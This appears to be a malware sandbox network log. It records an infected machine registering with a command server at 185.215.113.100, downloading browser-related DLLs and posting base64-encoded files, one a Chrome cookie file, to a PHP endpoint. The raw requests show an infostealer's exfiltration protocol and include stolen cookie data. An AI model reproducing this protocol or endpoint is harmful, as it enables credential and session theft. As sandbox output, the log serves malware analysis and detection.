Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 43 44 31 34 35 35 38 39 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="hwid"F7CD145589561166170430------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="build"leva------GHDHJEBFBFHJECAKFCAA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="message"browsers------IECAFHDBGHJKFIDHJJJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"plugins------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="message"fplugins------DGHJECAFIDAFHJKFCGHI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECBGIJDGCAEBFIIECAHost: 185.215.113.100Content-Length: 6535Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 185.215.113.100Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file"------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file"------BFHJECAAAFHIJKFIJEGC--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
